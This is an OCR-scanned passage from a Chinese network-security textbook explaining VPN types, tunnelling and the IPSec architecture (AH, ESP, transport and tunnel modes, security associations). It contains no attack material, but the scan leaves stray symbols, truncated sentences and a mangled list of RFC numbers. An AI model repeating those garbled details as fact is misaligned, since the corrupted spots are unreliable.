时 的 连接 ,是 一 条 穿 过 混乱 的 公共 网 络 的 安全 、 稳 定 的 隧道 。 所 谓 虚拟 ,是 指 无 须 拥 有 实际 
的 数据 线路 ,而 是 使 用 原 有 的 公共 网 络 (Internet) 数 据 线路 。 

选择 一 个 合适 的 虚拟 专用 网 解决 方案 或 产品 并 不 是 一 件 容易 的 事情 。 每 一 种 解决 方案 
都 可 提供 不 同 程度 的 安全 性 ` 可 用 性 ,并 且 都 各 有 优 缺 点 。 为 了 选择 一 个 合适 的 安全 产品 ， 
决策 者 应 该 首先 明确 公司 的 商业 需求 ,例如 ,公司 是 需要 将 少数 几 个 可 信 的 远 地 雇 员 连 接 到 
公司 总 部 ,还 是 希望 为 每 个 分 支 机 构 .合作 伙伴 、 供 应 商 、 顾 客 和 远 地 雇 员 都 建立 一 个 安全 连 
接 通 道 等 。 如 果 选 择 了 适当 的 虚拟 专用 网 , 便 可 以 保护 网 络 免 受 病毒 感染 、 防 止 欺骗. 防 商 
业 间 谍 , 增 强 访问 控制 ,加 强 系统 管理 ,强化 认证 等 。 

在 虚拟 专用 网 提供 的 功能 中 ,认证 和 加 密 是 最 重要 的 。 而 访问 控制 相对 比较 复杂 ,因为 
它 的 配置 与 实施 策略 和 所 用 的 工具 紧密 相关 。 虚 拟 专用 网 的 认证 、 加 密 和 访问 控制 这 3 种 
功能 必须 相互 配合 ,才能 保证 真正 的 安全 性 。 在 连接 到 因特网 之 前 ,企业 应 指定 相应 的 安全 
策略 ,清楚 地 说 明 不 同 身 份 的 用 户 可 以 访问 哪些 资源 。 一 个 更 安全 的 解决 方案 可 能 包括 防 
火 墙 .路 由 器 .代理 服 务 器 .虚拟 专 用 网 软件 或 硬件 。 它 们 中 的 任何 一 种 设备 可 能 提供 足够 
的 安全 通信 ,但 是 采用 何 种 设备 取决 于 安全 策略 。 


4.1.1 VPN 关键 技术 
为 了 保证 数据 通信 的 安全 性 .VPN 综合 采用 了 隧道 技术 加密 技术 。 


网 络 安 全 与 信息 保障 


1. 隧道 技术 (Tunneling) 

隧道 技术 是 一 种 通过 使 用 互联 网 络 的 基础 设施 在 网 络 之 间 传 递 数 据 的 方式 。 使 用 隧道 
传递 的 数据 (或 负载 ) 可 以 是 不 同 协议 的 数据 帧 或 包 。 隧 道 协议 将 其 他 协议 的 数据 帧 或 包 重 
新 封装 然后 通过 隧道 发 送 。 新 的 帧 头 提供 路 由 信息 ,以 便 通过 互联 网 传递 被 封装 的 负载 
数据 。 

隧道 技术 类 似 于 点 到 点 的 连接 ,这 种 方式 能 够 使 来 自 许多 信息 源 的 网 络 业 务 在 同一 个 
基础 设施 中 通过 不 同 的 隧道 进行 传输 。 隧 道 技术 使 用 点 对 点 通信 协议 代替 了 交换 连接 , 通 
过 路 由 网 络 来 连接 数据 地 址 。 隧 道 技术 允许 授权 移动 用 户 或 已 授权 的 用 户 在 任何 时 间 、 任 
何 地 点 访问 企业 网 络 。 

通过 隧道 的 建立 ,可 实现 如 下 的 功能 。 

CD 将 数据 流 强制 送 到 特定 的 地 址 

(2) 隐藏 私有 的 网 络 地 址 

(3) 在 IP 网 上 传递 非 IP 数据 包 

(4) 提供 数据 安全 支持 

2. 加 密 技术 

加 密 技术 是 电子 商务 采取 的 主要 安全 保密 措施 ,是 最 常用 的 安全 保密 手段 ,利用 技术 手 
段 把 重要 的 数据 变 为 乱码 (加 密 ) 传 送 ,到 达 目 的 地 后 再 用 相同 或 不 同 的 手段 还 原 (解密 )。 
加 密 技 术 的 应 用 是 多 方面 的 ,VPN 是 加 密 技 术 使 用 的 最 广泛 应 用 之 一 。 


4.1.2 VPN 的 分 类 


根据 不 同 需要 ,可 以 构造 不 同类 型 的 虚拟 专用 网 ,不 同 商业 环境 对 虚拟 专用 网 的 要 求 和 
虚拟 专用 网 所 起 的 作用 是 不 一 样 的 。 

根据 用 途 不 同 ,虚拟 专用 网 可 分 为 3 类 : 内 部 网 虚拟 专用 网 .远程 访问 虚拟 专用 网 和 外 
联网 虚拟 专用 网 。 

1. 内 部 网 虚拟 专用 网 

CD 在 公司 总 部 和 它 的 分 支 机 构 之 间 建 立 虚拟 专用 网 , 称 为 内 部 网 虚拟 专用 网 。 

© 在 公司 总 部 和 远 地 雇员 或 旅行 之 中 雇员 之 间 建 立 虚 拟 专用 网 , 称 为 远程 访问 虚拟 专 
用 网 。 

O 在 公司 与 商业 伙伴 、 顾 客 、 供 应 商 ,投资 者 之 间 建 立 虚拟 专用 网 , 称 为 外 联网 虚拟 专 
用 网 。 

内 部 网 是 通过 公共 网 络 将 一 个 组 织 的 各 分 支 机 构 的 局 域 网 连接 而 成 的 网 络 。 这 种 类 型 
的 局 域 网 到 局 域 网 的 连接 带 来 的 风险 最 小 ,因为 公司 通常 认为 他 们 的 分 支 机 构 是 可 信 的 ,这 
种 方式 连接 而 成 的 网 络 被 称 为 企业 内 联网 ,可 把 它 作 为 公司 网 络 的 扩展 。 

当 一 个 数据 传输 通道 的 两 个 端点 被 认为 是 可 信 的 时 候 , 公 司 可 以 选择 “内 部 网 虚拟 专用 
网 ”解决 方案 ,安全 性 主要 在 于 加 强 两 个 虚拟 专用 网 服务 器 之 间 加 密 和 认证 手段 上 。 大 量 的 
数据 经 常 需要 通过 虚拟 专用 网 在 局 域 网 之 间 传 递 。 通 过 把 中 心 数据 库 或 其 他 计算 资源 连接 
起 来 的 各 个 局 域 网 可 以 看 成 是 内 部 网 的 一 部 分 。 

这 里 仅 子 公司 中 有 一 定 访问 权限 的 用 户 才能 通过 内 部 网 虚拟 专用 网 访问 公司 总 部 的 资 
源 , 所 有 端点 之 间 的 数据 传输 都 要 经 过 加 密 和 身份 鉴别 。 如 果 一 个 公司 对 子 公司 或 个 人 有 


不 同 的 可 信 程度 ,那么 公司 可 以 考虑 基于 认证 的 虚拟 专用 网 方案 来 保证 信息 的 安全 传输 ,而 
不 是 靠 可 信和 的 通信 子 网 。 

这 种 类 型 的 虚拟 专用 网 的 主要 任务 是 保护 公司 的 因特网 不 被 外 部 入侵 ,同时 保证 公司 
的 重要 数据 流 经 因特网 时 的 安全 性 。 

2. 远程 访问 虚拟 专用 网 

通过 因特网 的 远程 拨号 访问 所 带 来 的 好 处 越 来 越 明 显 。 用 因特网 作为 远程 访问 的 骨干 
网 比 传统 的 方案 更 容易 实现 ,而 且 花 钱 更 少 。 如 果 一 个 用 户 无 论 是 在 家 里 还 是 在 旅途 之 中 ， 
想 同 公司 的 内 部 网 建立 一 个 安全 连接 , 则 可 以 用 “远程 访问 虚拟 专用 网 ”来 实现 。 典 型 的 远 
程 访问 虚拟 专用 网 是 用 户 通 过 本 地 的 信息 服务 提供 商 (ISP) 登 录 到 因特网 上 ,并 在 现在 的 
办 公 室 和 公司 内 部 网 之 间 建 立 一 条 加 密 信道 。 

远程 访问 虚拟 专用 网 的 客户 端 应 尽量 简单 ,因为 普通 雇员 一 般 都 缺乏 专门 训练 。 客 户 
应 该 可 以 手工 建立 一 条 虚拟 专用 网 信道 , 即 当 客户 每 次 想 建立 一 个 安全 通信 信道 时 ,只 需 安 
装 虚 拟 专 用 网 软件 。 在 服务 器 端 ,因为 要 监视 大 量 用 户 , 有 时 需要 增加 或 删除 用 户 , 这 样 可 
能 造成 混乱 ,并 带 来 安全 风险 ,因此 服务 器 应 集中 并 且 管 理 要 容易 。 

公司 往往 制定 一 种 透明 的 访问 策略 ,即使 在 远 处 的 雇员 也 能 像 坐 在 公司 总 部 的 办 公 室 
一 样 自由 的 访问 公司 的 资源 。 因 此 首先 要 考虑 的 是 所 有 端 到 端的 数据 都 要 加 密 , 并 且 只 有 
特定 的 接收 者 才能 解密 。 大 多 数 虚 拟 专用 网 除了 加 密 以 外 还 要 考虑 加 密 密 码 的 强度 .认证 
方法 。 这 种 虚拟 专用 网 要 对 个 人 用 户 的 身份 进行 认证 ,而 不 仅 认证 IP 地 址 ,这样 公司 就 会 
知道 哪个 用 户 欲 访问 公司 的 网 络 。 认 证 后 决定 是 否 允 许 用 户 对 网 络 资源 的 访问 。 认 证 技术 
可 以 用 一 次 口令 、Kerberos 认证 方案 、 令 牌 卡 .智能卡 或 指纹 。 一 旦 一 个 用 户 同 公 司 的 虚拟 
专用 网 服务 器 进行 了 认证 ,根据 他 的 访问 权限 表 , 他 就 具有 一 定 程 度 的 访问 权限 。 每 个 人 的 
访问 权限 表 由 网 络 管理 员 制 定 ,并 且 要 符合 公司 的 安全 策略 。 

有 和 较 高 安全 度 的 远程 访问 虚拟 专用 网 应 能 截取 到 特定 主机 的 信息 流 , 有 加 密 、 身 份 验 

3. 外 联网 虚拟 专用 网 

外 联网 虚拟 专用 网 为 公司 合作 伙伴 ,顾客 .供应 商 和 在 远 地 的 公司 雇员 提供 安全 性 。 它 
应 能 保证 包括 TCP 和 UDP 服务 在 内 的 各 种 应 用 服务 的 安全 ,例如 E-mail, HTTP, FTP, 
Real Audio、 数 据 库 的 安全 及 一 些 应 用 程序 (如 Java, ActiveX 的 安全 )。 因 为 不 同 公司 的 网 
络 环境 是 不 相同 的 ,一 个 可 行 的 外 部 网 虚拟 专用 网 方案 应 能 适用 于 各 种 操作 平台 、 协 议 、 各 
种 不 同 的 认证 方案 及 加 密 算法 。 

外 联网 虚拟 专用 网 的 主要 目标 是 保证 数据 在 传输 过 程 中 不 被 修改 ,保护 网 络 资源 不 受 
外 部 威胁 。 安 全 的 外 联网 虚拟 专用 网 要 求 公司 在 同 它 的 顾客 、 合 作 伙 伴 及 在 外 地 的 雇员 之 
间 经 因特网 建立 端 到 端的 连接 时 ,必须 通过 虚拟 专用 网 服务 器 才能 进行 。 在 这 种 系统 上 ,网 
络 管理 员 可 以 为 合作 伙伴 的 职员 指定 特定 的 许可 权 , 例 如 ,可 以 允许 对 方 的 销售 经 理 访问 一 
个 受到 保护 的 服务 器 上 的 销售 报告 。 

外 联网 虚拟 专用 网 中 应 是 一 个 由 加 密 、 认 证 和 访问 控制 功能 组 成 的 集成 系统 。 通 常 公 
司 将 虚拟 专用 网 代理 服务 器 放 在 一 个 不 能 穿 透 的 防火 墙 隔离 层 之 后 ,防火 墙 阻止 所 有 来 历 
不 明 的 信息 传输 。 所 有 经 过 过 滤 后 的 数据 通过 唯一 一 个 和 人 口传 到 虚拟 专用 网 服务 器 ,虚拟 
专用 网 服务 器 再 根据 安全 策略 来 进一步 过 滤 。 
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虚拟 专用 网 可 以 建立 在 网 络 协议 的 上 层 (如 应 用 层 ) ,也 可 建立 在 较 低 的 层次 (如 网 络 
层 )。 在 应 用 层 的 虚拟 专用 网 可 以 用 一 个 代理 服务 器 实现 ,这 就 是 说 ,不 直接 打开 任何 到 公 
司 内 部 网 的 连接 ,这 样 有 了 虚拟 专用 网 代理 服务 器 之 后 ,就 可 以 防止 IP 地 址 欺骗 。 所 有 的 
访问 都 要 经 过 代理 ,这 样 管理 员 就 可 以 知道 谁 曾 企图 访问 内 部 网 及 他 做 了 多 少 次 这 种 尝试 。 

外 联网 虚拟 专用 网 并 不 假定 连接 的 公司 双方 之 间 存 在 双向 信任 关系 。 外 联网 虚拟 专用 
网 在 因特网 内 打开 一 条 隧道 ,并 保证 经 包 过 滤 后 信息 传输 的 安全 。 当 公司 将 很 多 商业 活动 
都 通过 公共 网 络 进行 交易 时 ,一 个 外 部 网 虚拟 专用 网 应 该 用 高 强度 的 加 密 算法 , 密 钥 应 选 在 
128 位 以 上 。 此 外 应 支持 多 种 认证 方案 和 加 密 算法 ,因为 商业 伙伴 和 顾客 可 能 有 不 同 的 网 
络 结构 和 操作 平台 。 

外 联网 虚拟 专用 网 应 能 根据 尽 可 能 多 的 参数 来 控制 对 网 络 资源 的 访问 ,参数 包括 源 地 
址 、 目 的 地 址 、 应 用 程序 的 用 途 、 所 用 的 加 密 和 认证 类 型 .个 人 身份 .工作 组 、 子 网 等 。 管 理 员 
应 能 对 个 人 用 户 进行 身份 认证 ,而 不 仅仅 根据 IP 地 址 。 


4.1.3 虚拟 专用 网 的 工作 原理 


虚拟 专用 网 是 一 种 连接 ,从 表面 上 看 它 类 似 于 一 种 专用 连接 ,但 实际 上 是 在 共享 网 络 上 
实现 的 。 它 常 使 用 一 种 被 称 为 隧道 ”的 技术 ,数据 包 在 公共 网 络 上 的 专用 隧道 内 传输 ,专用 
隧道 用 于 建立 点 对 点 的 连接 。 来 自 于 不 同 数据 源 的 网 络 业务 经 由 不 同 的 隧道 在 相同 的 体系 
结构 上 传输 ,并 允许 网 络 协议 穿越 不 兼容 的 体系 结构 ,还 可 区 分 来 白 于 不 同 数据 源 的 业务 ， 
因而 可 将 该 业务 发 往 指定 的 目的 地 ,并 接受 指定 等 级 的 服务 。 

一 个 隧道 的 基本 组 成 是 : 一 个 隧道 启动 .一 个 路 由 网 络 (因特网 )、 一 个 可 选 的 隧道 交换 
机 ,一 个 或 多 个 隧道 终结 器 。 

隧道 启动 和 终止 可 由 许多 网 络 设备 和 软件 来 实现 。 例 如 ,一 个 隧道 可 以 由 一 台 位 于 
ISP 服务 点 的 适用 于 虚拟 专用 网 的 接 和 人 集中 器 建立 ,也 可 由 一 台 企业 分 支 机 构 或 办 公 室 局 
域 网 的 防火 墙 建立 ,该 防火 墙 也 需要 适用 于 虚拟 专用 网 。 或 者 还 可 由 一 台 带 有 模拟 的 PC 
调制 解 调 器 和 装 有 适用 于 虚拟 专用 网 的 拨号 软件 的 便携 机 来 建立 。 一 个 通道 可 由 ISP 的 网 
络 接 和 人 路 由 器 的 虚拟 专用 网 网 关 终止 或 者 由 隧道 终结 器 或 企业 网 的 交换 机 终止 。 

此 外 ,通常 还 需要 一 台 或 多 台 安 全 服务 器 ,虚拟 专用 网 除了 具备 常规 的 防火 墙 和 地 址 转 
换 功能 ,还 应 具有 数据 加 密 .鉴别 和 授权 的 功能 。 安 全 服务 器 通常 也 提供 带宽 和 隧道 终端 节 
点 信息 ,在 某 些 情况 下 还 可 提供 网 络 规则 信息 和 服务 等 级 信息 。 

要 建立 隧道 ,现在 所 用 的 安全 协议 主要 是 PPTP/L2TP 协议 或 IPSec 协议 。 

下 面 来 说 明 虚 拟 专用 网 的 工作 原理 。 

在 远程 访问 虚拟 专用 网 的 情况 下 ,远程 访问 客户 需要 向 远程 访问 服务 器 发 送 点 对 点 协 
议 (PPP) 数 据 包 。 同 样 ,在 采用 局 域 网 对 局 域 网 的 虚拟 租用 线路 (VLL) 的 情况 下 ,一 个 局 域 
网 上 的 路 由 器 需 向 另 一 个 局 域 网 的 路 由 器 发 送 PPP 数据 包 。 

不 同 的 是 ,客户 机 对 服务 器 的 情况 下 ,PPP 数据 包 不 是 通过 专用 线路 传送 ,而 是 通过 共 
享 网 络 的 隧道 进行 传送 。 虚 拟 专用 网 的 作用 就 如 同 在 广域网 上 拉 一 条 串 行 电缆 。 点 对 点 协 
议 经 过 协商 ,在 远程 用 户 和 隧道 终止 设备 之 间 建 立 一 条 直接 连接 。 创 建 符 合 标准 的 虚拟 专 
用 网 隧道 经 常 采用 下 列 方法 。 

CD 将 网 络 协议 (IP、IPX、AppleTalk 等 ) 封 装 到 PPP 协议 中 ,典型 的 隧道 协议 是 IP 协 


议 , 但 也 可 是 ATM 协议 或 帧 中 继 协 议 。 由 于 传送 的 是 第 二 层 协议 , 故 该 方法 被 称 为 第 二 层 
隧道 。 

© 将 网 络 协议 直接 封装 到 隧道 协议 中 ,例如 虚拟 隧道 协议 (VTP) 中 。 由 于 传送 是 第 三 
层 协 议 , 故 该 方法 被 称 为 第 三 层 隧道 。 

隧道 启动 器 在 隧道 内 封装 的 是 在 TCP/IP 包 中 封装 原生 包 一 一 IPX 包 。 它 包括 控制 信 
息 在 内 的 整个 IPX 包 都 将 成 为 TCP/IP 包 的 负载 ,然后 它 通过 因特网 传输 。 另 一 端 隧道 终 
结 器 的 软件 打开 包 并 将 其 发 送 给 原来 的 协议 进行 常规 处 理 。 

在 4.2 节 中 将 着 重 介绍 第 三 层 隧道 协议 IPSec, 


4.2 IPSec 与 VPN 实现 


4.2.1 IPSec 概述 


IPSec 协议 是 一 个 范围 广泛 ,开放 的 虚拟 专用 网 安全 协议 。IPSec 适应 向 IPv6 迁移 , 它 
提供 所 有 在 网 络 层 上 的 数据 保护 ,提供 透明 的 安全 通信 。IPSec 用 密码 技术 从 3 个 方面 来 
保证 数据 的 安全 。 

。 认证 : 用 于 对 主机 和 端点 进行 身份 鉴别 。 

。 完整 性 检查 ; 用 于 保证 数据 在 通过 网 络 传输 时 没有 被 修改 。 

。 加 密 : 用 加 密 IP 地 址 和 数据 以 保证 私有 性 。 

IPSec 协议 可 以 设置 成 在 两 种 模式 下 运行 : 一 种 是 隧道 模式 ,一 种 是 传输 模式 。 

在 隧道 模式 下 ,IPSec 把 IPv4 数据 包 封装 在 安全 的 IP 帧 中 ,这 样 保护 从 一 个 防火 墙 到 
另 一 个 防火 墙 时 的 安全 性 。 信 息 封 装 是 为 了 保护 端 到 端的 安全 性 , 即 在 这 种 模式 下 不 会 隐 
藏 路 由 信息 。 隧 道 模式 是 最 安全 的 ,但 会 带 来 较 大 的 系统 开销 。IPSec 现在 还 不 完全 成 熟 ， 
但 它 得 到 了 一 些 路 由 器 厂商 和 硬件 厂商 的 大 力 支 持 , 预 计 今后 将 成 为 虚拟 专用 网 的 主要 标 
准 。IPSec 有 扩展 能 力 以 适应 未 来 商业 的 需要 。 

在 1997 年 底 ,IETF 安全 工作 组 完成 了 IPSec 的 扩展 ,在 IPSec 协议 中 加 上 ISAKMP 
(Internet Security Association and Key Management Protocol) 协 议 ,其 中 还 包括 一 个 密 钥 
分 配 协议 Oakley。ISAKMP/Oakley 支持 自动 建立 加 密 信 道 , 密 钥 的 自动 安全 分 发 和 更 新 。 
IPSec 也 可 用 于 连接 其 他 层 已 存在 的 通信 协议 , 如 支持 安全 电子 交易 SET (Secure 
Electronic Transaction) 协 议和 SSL 协议 。 即 使 不 用 SET 或 SSL,IPSec 也 能 提供 认证 和 加 
密 手 段 以 保证 信息 的 传输 。 

优点 : 它 定 义 了 一 套用 于 认证 、 保 护 私 有 性 和 完整 性 的 标准 协议 ; IPSec 支持 一 系列 加 
密 算 法 如 DES, 三 重 DES IDEA; 它 检查 传输 的 数据 包 的 完整 性 ,以 确保 数据 没有 被 修改 ; 
IPSec 用 来 在 多 个 防火 墙 和 服务 器 之 间 提 供 安 全 性 ; IPSec 可 确保 运行 在 TCP/IP 协议 上 的 
VPNs 之 间 的 互 操作 性 。 

缺点 : IPSec 在 客户 机 /服务 器 模式 下 实现 有 一 些 问 题 ,在 实际 应 用 中 ,需要 公 钥 来 完 
成 ; IPSec 需要 已 知 范围 的 IP 地 址 或 固定 范围 的 IP 地 址 ,因此 在 动态 分 配 IP 地 址 时 不 太 
适合 于 IPSec; KT TCP/IP 协议 外 ,IPSec 不 支持 其 他 协议 ; 除了 包 过 滤 之 外 , 它 没有 指定 
其 他 访问 控制 方法 ; IPSec 最 适合 可 信 的 LAN 到 LAN 之 间 的 虚拟 专用 网 , 即 内 部 网 虚拟 
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专用 网 。 

1. IPSec 结构 

IP 包 本 身 没 有 任何 安全 特性 ,攻击 者 很 容易 伪造 IP 包 的 地 址 、 修 改 包 内 容 、 重 播 以 前 
的 包 以 及 在 传输 过 程 中 拦截 并 查看 包 的 内 容 。 因 此 , 收 到 的 TP 数据 包 源 地 址 可 能 不 是 来 自 
真实 的 发 送 方 ; 包含 的 原始 数据 可 能 遭 到 更 改 ; 原始 数据 在 传输 过 程 中 可 能 被 其 他 人 

IPSec 是 IETF( 因 特 网 工程 任务 组 ) 于 1998 年 11 月 公布 的 IP 安全 标准 ,其 目标 是 为 
IPv4 和 IPv6 提供 透明 的 安全 服务 。IPSec 在 IP 层 上 提供 数据 源 地 址 验证 .无 连接 数据 完 
整 性 ,数据 机 密 性 、 抗 重播 和 有 限 业 务 流 机密 性 等 安全 服务 。 各 种 应 用 程序 可 以 享用 IP 层 
提供 的 安全 服务 和 密 钥 管理 ,而 不 必 设 计 和 实现 自己 的 安全 机 制 , 因 此 减少 密 钥 协商 的 开 
销 , 也 降低 了 产生 安全 漏洞 的 可 能 性 。 

IPSec 可 保障 主机 之 间 、 网 络 安全 网 关 ( 如 路 由 器 或 防火 墙 ) 之 间或 主机 与 安全 网 关 之 
间 的 数据 包 的 安全 。 

使 用 IPSec 可 以 防范 以 下 几 种 网 络 攻击 : 

(D Sniffer: IPSec 对 数据 进行 加 密 对 抗 Sniffer ,保持 数 据 的 机 密 性 。 

(2) 数据 算 改 : IPSec 用 密 钥 为 每 个 IP 包 生成 一 个 消息 验证 码 (MAC) ,该 密 钥 为 且 仅 
为 数据 的 发 送 方 和 接收 方 共享 。 对 数据 包 的 任何 算 改 ,接收 方 都 能 够 检测 。 保 证 了 数据 的 

(3) 身份 欺骗 : IPSec 的 身份 交换 和 认证 机 制 不 会 暴露 任何 信息 ,依赖 数据 完整 性 服务 
实现 了 数据 起 源 认证 。 

(4) 重 放 攻 击 : IPSec 防止 了 数据 包 被 捕获 并 重新 投放 到 网 上 , 即 目 的 地 址 会 检测 并 拒 
绝 旧 的 或 重复 的 数据 包 ; 它 通过 与 AH 或 ESP 一 起 工作 的 序列 号 实现 。 

(5) 拒绝 服务 攻击 : IPSec 依据 IP 地 址 范围 协议 ,甚至 特定 的 协议 端口 号 来 决定 哪些 
数据 流 需 要 受到 保护 ,哪些 数据 流 可 以 被 允许 通过 ,哪些 需要 拦截 。 

IPSec 规范 中 包含 大 量 的 RFC 文档 ,其 中 最 重要 的 是 在 1998 年 11 月 发 布 的 ,它们 是 安 
全 体系 结构 (IPSec) 概 述 RFC2401、 包 身份 验证 扩展 (Authentication Header. AH) 到 IPv4 
和 IPv6 的 描述 2402 im 25 p (Encapsulating Security Payload,ESP) 到 IPv4 和 IPv6 的 
描述 2406 和 Internet 42422 (Internet Key Exchange. IKE) HPX 2409, 

IPSec 对 于 IPv4 是 可 选 使 用 的 ,对 于 IPv6 是 强制 使 用 的 。 安 全 特征 作为 扩展 报头 实 
现 , 它 跟 在 主 IP 报头 后 面 。 身 份 验 证 的 扩展 报头 称 为 身份 验证 报头 (AH) ,加 密 报 头 称 为 
封装 安全 性 有 效 载 荷 报头 (ESP) 。 

IPSec 安全 体系 结构 如 图 4. 1 所 示 。 

CD 安全 体系 结构 : 包含 了 一 般 的 概念 、 安 全 需求 .定义 和 定义 IPSec 的 技术 机 制 。 

(2) 封装 安全 载荷 (ESP) 协 议 : 覆盖 了 为 了 包 加 密 (可 选 身份 验证 ) 与 ESP 的 使 用 相关 
的 包 格 式 和 常规 问题 。 

G) 验证 头 (AH) 协 议 : 包含 使 用 AH 进行 包 身份 验证 相关 的 包 格 式 和 一 般 问 题 。 

(4) 加 密 算法 : 描述 各 种 加 密 算 法 如 何 用 于 ESP 中 。 

(5) 验证 算法 : 描述 各 种 身份 验证 算法 如 何 用 于 AH 中 和 ESP 身份 验证 选项 。 

(6) 解释 域 (DOD : 彼此 相关 各 部 分 的 标识 符 及 运作 参数 。 
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图 4.1 IPSec 安全 体系 结构 


(7) 密 钥 管理 : 密 钥 管理 的 一 组 方案 ,其 中 IKE 是 默认 的 密 钥 自动 交换 协议 ,IKE 适合 
为 任何 一 种 协议 协商 密 钥 ,并 不 仅 限于 IPSec 的 密 钥 协商 ,协商 的 结果 通过 解释 域 (IPSec 
DOD 转 化 为 IPSec 所 需 的 参数 。 

(8) 策略 : 决定 两 个 实体 之 间 能 否 通 信 , 以 及 如 何 进行 通信 。 策 略 的 核心 由 3 部 分 组 
成 : 安全 关联 SA、SAD、SPD。SA 表示 了 策略 实施 的 具体 细节 ,包括 源 / 目 的 地 址 .应 用 协 
议 、SPI( 安 全 策略 索引 ) ,所 用 算法 / 密 钥 /长 度 ; SAD 为 进入 和 外 出 包 处 理 维持 一 个 活动 的 
SA 列表 ; SPD 决定 了 整个 系统 的 安全 需求 。 策 略 部 分 是 唯一 尚未 成 为 标准 的 组 件 。 

2. IPSec 传送 模式 与 通道 模式 

IPSec 协议 (包括 AH 和 ESP) 既 可 用 来 保护 一 个 完整 的 IP 载荷 ,也 可 用 来 保护 某 个 IP 
载荷 的 上 层 协议 。 这 两 方面 的 保护 分 别 是 由 IPSec 两 种 不 同 的 模式 来 提供 的 。 其 中 ,传送 
模式 用 来 保护 上 层 协 议 ; 而 通道 模式 (隧道 模式 ) 用 来 保护 整个 IP 数据 包 。 两 种 IPSec 协 
议 (AH 和 ESP) 均 能 同时 以 传送 模式 或 通道 模式 工作 。 

A) 传送 模式 。 在 IPv4 中 ,传输 模式 的 IPSec 头 插入 到 IP 报头 之 后 高层 传输 协议 (如 
TCP、UDP) 之 前 。 在 IPv6 中 ,该 模式 的 IPSec 头 出 现在 IP 头 及 IP 扩展 头 之 后 高 层 传输 
协议 之 前 。 

(2) 通道 模式 。 要 保护 的 整个 IP 包 都 需 封 装 到 另 一 个 TP 数据 包 中 ,同时 在 外 部 与 内 
部 了 P 头 之 间 插 入 一 个 IPSec 头 。 外 部 IP 头 指明 进行 IPSec 处 理 的 目的 地 址 ,内 部 IP 头 指 
明 最 终 的 目的 地 址 。 若 构成 一 个 安全 联盟 的 两 个 终端 中 至 少 有 一 个 是 安全 网 关 ( 而 不 再 是 
主机 ) , 则 这 个 安全 联盟 就 必须 采用 隧道 模式 。 在 隧道 模式 下 ,IPSec 报 文 要 进行 分 段 和 重 
组 操作 ,并且 可 能 要 再 经 过 多 个 安全 网 关 才 能 到 达 安 全 网 关 后 面 的 目的 主机 ,如 图 4. 2 
所 示 。 
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3. 安全 关联 SA 

为 正确 封装 及 提取 IPSec 数据 包 , 有 必要 采取 一 套 专 门 的 方案 ,将 安全 服务 / 密 钥 与 要 
保护 的 通信 数据 联系 到 一 起 ; 同时 要 将 远程 通信 实体 与 要 交换 密 钥 的 IPSec 数据 传输 联系 
到 一 起 。 换 言 之 ,要 解决 如 何 保护 通信 数据 .保护 什么 样 的 通信 数据 以 及 由 谁 来 实行 保护 的 
问题 。 这 样 的 构建 方案 称 为 安全 关联 (Security Association. SA) 。 

SA 是 两 个 应 用 IPSec 实体 (主机 、 路 由 器 ) 间 的 一 个 单 向 逻辑 连接 ,决定 保护 什么 、 如 何 
保护 及 谁 来 保护 通信 数据 。 它 规定 了 用 来 保护 数据 包 安 全 的 IPSec 协议 、 转 换 方 式 、 密 钥 及 
密 钥 的 有 效 存在 时 间 等 。SA 是 单 向 的 ,要 么 对 数据 包 进 行 “ 进 入 ”保护 ,要 么 进行 “外 出 " 保 
护 。 具 体 采 用 什么 方式 ,要 由 3 个 方面 的 因素 决定 : 第 一 个 是 安全 参数 索引 (SPD ,该 索引 
存在 于 IPSec 协议 头 内 ; 第 二 个 是 IPSec 协议 值 ; 第 三 个 是 要 向 其 应 用 SA 的 目标 地 址 。 
通常 ,SA 是 以 成 对 的 形式 存在 的 ,每 个 SA 朝 一 个 方向 。 既 可 人 工 创 建 它 , 又 可 采用 动态 创 
建 方式 。SA 驻 留 在 安全 关联 数据 库 (SAD) 内 。 

SA 提供 的 安全 服务 取决 于 所 选 的 安全 协议 (AH 或 ESP)、SA 模式 、SA 作用 的 两 端点 
和 安全 协议 所 要 求 的 服务 。 

AH 为 IP 数据 包 提供 数据 源 验证 和 无 连接 完整 性 。AH 还 提供 抗 重播 服务 。 接 收 端 
是 否 需要 这 一 服务 ,可 自行 决定 。AH 不 对 数据 包 进 行 加 密 ,ESP 则 可 提供 加 密 、 验 证 以 及 
抗 重播 服务 。ESP 验证 的 数据 不 包括 外 部 IP 头 ,加 密 和 验证 服务 至 少 选择 其 中 之 一 。 

ESP 为 SA 的 加 密 服务 提供 了 有 限 业务 流 机 密 性 。 通 道 模式 隐藏 了 数据 包 的 源 地 址 和 
目的 地 址 。ESP 数据 包 进 行 填充 ,隐藏 了 数据 包 的 真实 大 小 ,进而 隐藏 了 其 通信 特征 。 移 
动用 户 的 IP 地 址 是 动态 分 配 的 ,通过 与 公司 的 作为 网 关 使 用 的 防火 墙 间 建立 通道 模式 ESP 
SA, 也 可 实现 业务 流 的 机 密 性 。 

一 个 SA 对 IP 数据 包 不 能 同时 提供 AH 和 ESP 保护 。 有 时 ,特定 的 安全 策略 要 求 对 
通信 提供 多 种 安全 保护 ,这 就 需要 使 用 多 个 SA。 当 把 一 系列 SA 应 用 于 业务 流 时 , 称 为 SA 
We SA 束 的 顺序 由 安全 策略 决定 ,SA 束 中 各 个 SA 的 终点 可 能 不 同 。 例 如 ,一 个 SA 可 能 
用 于 移动 主机 与 安全 网 关 之 间 ,而 另 一 个 SA 可 能 用 于 移动 主机 与 安全 网 关内 的 主机 。 

SA 的 管理 就 是 创建 和 删除 ,可 以 使 用 手工 方式 或 动态 方式 。 

手工 方式 下 ,安全 参数 由 管理 员 按 安全 策略 手工 指定 .手工 维护 。 但 是 ,手工 维护 容易 
出 错 ,而且 手工 建立 的 SA 没有 存活 时 间 的 说 法 ,除非 再 用 人 工 方式 将 其 删除 ,否则 便 会 一 
直 存 在 下 去 。 

若 用 动态 方式 创建 , 则 SA 有 一 个 存活 时 间 与 其 关联 在 一 起 。 这 个 存活 时 间 通 常 是 由 
密 钥 管理 协议 在 IPSec 通信 双方 之 间 加 以 协商 而 确立 下 来 的 ,存活 时 间 非 常 重 要 。 若 超时 
使 用 一 个 密 钥 ,会 为 攻击 者 侵入 系统 提供 更 多 的 机 会 。SA 的 自动 建立 和 动态 维护 是 通过 
IKE 进行 的 。 如 果 安 全 策略 要 求 建立 安全 、 保 密 的 连接 ,但 却 不 存在 相应 的 SA, IPSec 的 内 
核 则 启动 或 触发 IKE 协商 。 

两 种 IPSec 协议 均 提 供 了 一 个 抗 重播 服务 。 

